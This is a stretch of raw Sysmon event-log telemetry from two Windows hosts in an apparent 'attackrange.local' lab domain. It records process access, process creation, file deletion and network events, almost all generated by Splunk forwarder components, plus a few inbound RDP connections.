09:03:25.916{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976985Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976984Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976983Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976982Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-88DD-6151-8879-00000000FD01}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976981Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88DD-6151-8879-00000000FD01}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976980Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.901{69CF5F33-88DD-6151-8879-00000000FD01}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976979Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.182{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E86A49F24EF344114D097E5B6666A9D4,SHA256=F0D3DE59EE4F606995F7B88DA6F260A5D360F82F6D4942D5C064E3D66BF3DD01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:25.159{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=981C9B8FE78CCCE39D83B050BB583C29,SHA256=00B426FDEBA03AB4C96421C8B672A54EC17A451FEB51A5305E85A7F87F6A0546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976978Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.025{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9D2A9239C6D13957B212A75C1F0CE4A,SHA256=8ADCBDEA276F77E6693FF7796F743377DBD68F9C8F74F235DACAD7034D448371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977011Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.822{69CF5F33-88DE-6151-8979-00000000FD01}3208372C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000977010Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:23.307{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de55189-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977009Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:22.357{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54945-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000977008Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.619{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88DE-6151-8979-00000000FD01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977007Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977006Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977005Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977004Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977003Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977002Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977001Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977000Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976999Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-88DE-6151-8979-00000000FD01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976998Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976997Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.604{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88DE-6151-8979-00000000FD01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976996Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.589{69CF5F33-88DE-6151-8979-00000000FD01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976995Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.197{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABC657F1712B8CA7F8D573AAC6A7BB2F,SHA256=4A4D7B2C3C63018E0D017A885CE23420F8D399441CCC45114E9A4E6F0C98DA95,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:23.772{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53233-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:26.160{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6025085DB6F309E4325C2AAA81D6358A,SHA256=1467509AF0C3FA246BA700FEA2DA3083A1C21D502EE39322946C5ED5297BBA7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976994Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.150{69CF5F33-88DD-6151-8879-00000000FD01}34083112C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000976993Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.119{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6062B4CD6527B3C7AAB2112E4FC3A9AC,SHA256=089528133E18987622223E36A6A22AA696399E7FF716ADF536BE82D5BDEF77DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:27.213{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11CE55D283F765A7237598638873722E,SHA256=A66B92331556F695F60C17D171DAE123569A0C7B55B75A37604208CEF9B86481,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977040Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 